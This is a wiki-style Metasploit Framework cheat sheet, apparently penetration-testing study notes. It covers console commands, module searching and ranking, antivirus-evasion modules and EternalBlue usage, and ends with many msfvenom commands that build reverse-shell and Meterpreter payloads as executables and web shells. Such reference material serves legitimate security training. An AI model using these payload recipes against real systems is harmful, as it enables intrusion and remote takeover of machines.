====== Metasploit Framework ======
===== Description & Concepts =====
==== Free ====
**Metasploit Framework** is the free, open-source version of Metasploit, an exploitation framework.
* Metasploit supports all phases of a penetration testing engagement, from information gathering to post-exploitation.
==== Concepts ====
There are three general concepts within the Metasploit framework:
- **Vulnerability:** A design, coding, or logic flaw affecting the target system.
- **Exploit:** A piece of code that uses a vulnerability present on the target system.
- **Payload:** The code that will run on the target system (delivered by the exploit).
==== The Console ====
* ''msfconsole'' starts the program and drops you off at a prompt: ''msf6 >'' (or ''msf5 >'')
* Almost any Linux command can be run from the ''msf6'' prompt (e.g., ''ls'', ''ping'', ''clear'', etc.
==== 4 Main Activities ====
There are 4 main activities you will most always do when using Metasploit:
- Start the console: command line ''msfconsole''
* Review available options at the ''msf'' prompt with: ''?''.
- Select an exploit: this will get you into the target...
* See a full list: ''show exploits''
* Search: ''search [keyword]:[arg] [keyword]:[arg]''
- Select a payload: this is what you want to do once you're in...
* See a full list: ''show payloads''
- Run the exploit:
* Set any necessary options first (e.g., rhost)
* ''run'' your exploit
==== Help ====
* ''help [command name]'' - Shows the help file for the command indicated.
* ''history'' - See a list of commands you used (so you can then do a ''help [command]'' on the command you need help with).
----
===== Modules & Usage =====
==== Search for Module ====
''search [parameters/keyword]'' - Search the Metasploit Framework database for modules relevant to the given search parameter/keyword.
* You can conduct searches using CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system type.
* Example, CVE: ''search ms17-101''
* Example, type: ''search type:auxiliary telnet''
**Alternative Search Option:** Rapid7 maintains a [[https://www.rapid7.com/db/?type=metasploit | searchable web-based exploit database]]. Find your exploit there and tell msf to use it.
''info'' - To see more information on the loaded module. You can see info on any module at any time by using the command ''info'' followed by the full path the module you need info on.
**Parameters (Keywords):**
^ Keyword ^ Description ^
| app | client or server attack |
| author | search by module author |
| bid | search by BugTrack ID |
| cve | search by CVE ID |
| edb | search by Exploit-DB ID |
| name | search by descriptive name |
| platform | search by platform (Windows, Linux, etc.) |
| ref | modules with a specific ref. |
| type | search by type (exploit, auxiliary, post) |
==== Search Result Ranking ====
You want a **Normal** ranking or above. Command to filter exploits by ranking:
# search for exploits ranked great:
search -r great
# set the same filter globally:
setg MinimumRank great
^ Rank ^ Description [[https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html | source]] ^
| Excellent | The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances (WMF Escape()). |
| Great | The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. |
| Good | The exploit has a default target and it is the “common case” for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). Exploit does not auto-detect the target. |
| Normal | The exploit is otherwise reliable, but depends on a specific version that is not the “common case” for this type of software and can’t (or doesn’t) reliably autodetect. |
| Average | The exploit is generally unreliable or difficult to exploit, but has a success rate of 50% or more for common platforms. |
| Low | The exploit is nearly impossible to exploit (under 50% success rate) for common platforms. |
| Manual | The exploit is unstable or difficult to exploit and is basically a DoS (15% success rate or lower). This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/unix/webapp/php_eval). |
==== Select Module to Use ====
''use'' - Select a module to use. Follow ''use'' with the full path to the module you want to use or its number in your search result list. Example:
use exploit/windows/smb/ms17_010_eternalblue
# Results in a new, descriptive msf prompt
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
''back'' - Back out of (de-select, un-use) the module you just selected with ''use''.
==== Set Options ====
''show options'' or just ''options'' - Shows you the options of the loaded module that you can set.
''show advanced'' or just ''advanced'' - Shows you the advanced options of the loaded module that you can set.
''set [option name] [value]'' - Set the module options you need to set.
''unset [option name or all]'' - Unset a specific module option or all of them.
''setg'' - will set an option globally to be used by default in whatever module.
''unsetg'' - will unset your global option.
==== Run Module ====
''exploit'' or ''run'' - Launch the module.
* Side note: the ''run'' command is an alias created for the ''exploit'' command because "exploit" did not make sense when using modules that were not exploits, like port scanners, vulnerability scanners, etc.
* ''exploit -z'' (a nod to the ''Ctrl-z'' session key-binding) will put your newly created session into the background automagically.
**Sessions:** Once a vulnerability has been successfully exploited (with ''exploit'' or ''run'') a session will be created. A session is the communication channel established between the target system and Metasploit.
* ''background'' or ''Ctrl-z'' - at your session prompt (e.g. ''meterpreter >''), this commando will send the session to the background (out of your way, so you will not be interacting with it).
* ''sessions'' - lists out your current sessions
* ''sessions -i [Id number]'' - pull a session from the background to the foreground to interact with it.
----
===== Modules & Categories =====
==== [1] Auxiliary ====
Any supporting module, such as scanners, crawlers and fuzzers. Found here:
/usr/share/metasploit-framework/modules/auxiliary
==== [2] Encoders ====
Allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.
* Encoders can have a limited success rate as antivirus solutions can perform additional checks.
* Found here:
/usr/share/metasploit-framework/modules/encoders
==== [3] Evasion ====
Direct attempts to evade antivirus software.
* Encoders will encode the payload and thus obfuscate the signature.
* Evasion modules are an actual direct attempt to evade antivirus software.
/usr/share/metasploit-framework/modules/evasion
==== [4] Exploits ====
Modules that... well... exploit. Very neatly organized by target system here:
/usr/share/metasploit-framework/modules/exploits
==== [5] NOPs ====
NOPs (No OPeration) do nothing, literally.
* They are often used as a buffer to achieve consistent payload sizes.
/usr/share/metasploit-framework/modules/nops
==== [6] Payloads ====
Payloads are codes that will run on the target system.
* Exploits leverage a vulnerability to gain access on a target system, but to achieve our goal we need a payload.
* Examples: get a shell, load malware, load a backdoor, run a command, etc.
/usr/share/metasploit-framework/modules/payloads
Payloads are split into three categories:
- **Singles:** Self-contained payloads that do not need to download any additional component to run.
- **Stagers:** Set up a connection channel between Metasploit and the target system.
* Useful when working with staged payloads.
* //Staged payloads// will first upload a stager on the target system then download the rest of the payload (in stages).
* This provides some advantages as the initial size of each stage will be relatively small compared to the full payload.
- **Stages:** Downloaded by the stager. This will allow you to use larger sized payloads
Inline (single) vs. Staged Payloads:
* An inline (single) payload will have a filename with the underline (''_'') separating the words.
* Example: ''generic/shell_reverse_tcp''
* The staged payload will separate the initial part of the filename into a subdir name (separating the initial part of the name is indicative of the separation of the payload into stages).
* Example: ''windows/x64/shell/reverse_tcp''
==== [7] Post ====
Post modules are useful during the final, post-exploitation phase. Found here:
/usr/share/metasploit-framework/modules/post
----
===== Syntax (Examples) =====
==== Two Common Commands ====
After a successful exploit (and assuming your payload was Meterpreter), two common commands you will likely often want to try:
# priv esc to admin
getsystem
# get a shell in the exploit directory on the target
shell
==== msfvenom ====
See [[cheat_sheets_various#msfvenom | here]].
==== MSF Handler ====
''msfconsole''...Handlers should be in the following format:
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
==== Non-Meterpreter Binaries ====
**Staged Payloads for Windows**
# x86
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
# x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe
**Stageless Payloads for Windows**
# x86
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
# x64
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe
**Staged Payloads for Linux**
# x86
msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
# x64
msfvenom -p linux/x64/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf
**Stageless Payloads for Linux**
# x86
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
# x64
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf
==== Non-Meterpreter Web Payloads ====
# asp
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.asp
# jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
# war
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
# php
msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php
==== Meterpreter Binaries ====
**Staged Payloads for Windows**
# x86
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
# x64
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe
**Stageless Payloads for Windows**
# x86
msfvenom -p windows/meterpreter_reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
# x64
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe
**Staged Payloads for Linux**
# x86
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
# x64
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf
**Stageless Payloads for Linux**
# x86
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
# x64
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf
==== Meterpreter Web Payloads ====
# asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
# jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > example.jsp
# war
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > example.war
# php
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php